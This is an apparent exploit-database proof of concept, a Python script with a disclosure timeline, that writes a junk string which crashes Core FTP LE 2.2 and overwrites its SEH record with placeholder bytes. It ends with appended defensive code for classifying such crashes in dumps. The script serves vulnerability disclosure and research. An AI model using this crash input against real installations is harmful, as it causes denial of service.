#!/usr/bin/python
# Exploit Title: Core FTP LE Version 2.2, build 1935 - Local Buffer Overflow (SEH Unicode)
# Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a buffer overflow vulnerability that may result in a DoS via the local folder selection pane
# Exploit Type: DOS
# Date: 08-Sep-2019
# Vulnerable Software: Core FTP LE
# Version: Version 2.2, build 1935
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download/coreftplite.exe
# Tested Windows: Windows Vista Ultimate SP2 (32-bit), Windows 7 Professional SP1 (32-bit)
# Exploit Author: Debashis Pal

# Timeline
# Vulnerability Discovery Date: 01-Sep-2019
# Vulnerability Reported to Vendor: 01-Sep-2019, no response
# Emailed Vendor Again: 05-Sep-2019, no response
# Public Disclosure: 08-Sep-2019

# PoC
# 1. Generate coreftpleversion2-2build1935.txt with the POC.py code, open it in Notepad and copy the contents
# 2. Open Core FTP LE (Version 2.2, build 1935)
# 3. Select the left interface (Core FTP LE, local folder selection pane)
# 4. Paste the contents from Notepad
# 5. The application will crash and SEH is overwritten with Unicode

crash = "\x43" * 585   # Junk
crash += "\x42" * 2    # nSEH
crash += "\x41" * 2    # SEH
crash += "\x44" * 411  # More junk

file = "coreftpleversion2-2build1935.txt"
generate = open(file, "w")
generate.write(crash)
generate.close()  # call close() so the buffer is flushed to disk

# Attachment: Application will crash and SEH overwritten with Unicode.jpg

# Thank you,
# Debashis Pal
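For anyone triaging the crash this PoC produces, the following added example (not part of the original PoC or of Core FTP) works out what the SEH record holds once the pasted text has been widened, and classifies a record read from a debugger or crash dump. It assumes the input is converted to UTF-16LE before it reaches the stack, as the "SEH Unicode" title implies; the function names and the sample addresses are hypothetical.

```python
import struct

# Field sizes copied from the PoC (counts are characters before widening).
LAYOUT = [("junk", "C", 585), ("nSEH", "B", 2), ("SEH", "A", 2), ("more_junk", "D", 411)]

def widened_layout(layout=LAYOUT):
    """Return (buffer, spans): the UTF-16LE bytes and each field's (offset, size)."""
    text, spans, pos = "", {}, 0
    for name, ch, count in layout:
        spans[name] = (pos, count * 2)  # every ASCII character becomes 2 bytes
        pos += count * 2
        text += ch * count
    return text.encode("utf-16-le"), spans

def seh_record(buf, spans):
    """Read the registration record as two little-endian DWORDs: (next, handler)."""
    return struct.unpack_from("<II", buf, spans["nSEH"][0])

def is_widened_ascii(dword):
    """True for the 0x00XX00YY shape left by two widened printable ASCII characters."""
    return all(0x20 <= half <= 0x7E for half in (dword >> 16, dword & 0xFFFF))

def triage(next_ptr, handler):
    """Classify an SEH record read from a debugger or crash dump."""
    if is_widened_ascii(handler):
        chars = chr(handler & 0xFFFF) + chr(handler >> 16)
        return "handler overwritten by widened input %r" % chars
    if is_widened_ascii(next_ptr):
        return "next pointer overwritten, handler intact"
    return "record does not look like widened text"

if __name__ == "__main__":
    buf, spans = widened_layout()
    nxt, handler = seh_record(buf, spans)
    print("nSEH at byte offset %d, SEH at %d, total %d bytes"
          % (spans["nSEH"][0], spans["SEH"][0], len(buf)))
    print("next=0x%08X handler=0x%08X -> %s" % (nxt, handler, triage(nxt, handler)))
    # Constructed values standing in for an untouched record.
    print(triage(0x0012FFC4, 0x77A1B2C3))
```

A handler value of this shape in a crash report means the record was filled from user-supplied text, which separates this bug from an unrelated access violation in the same pane.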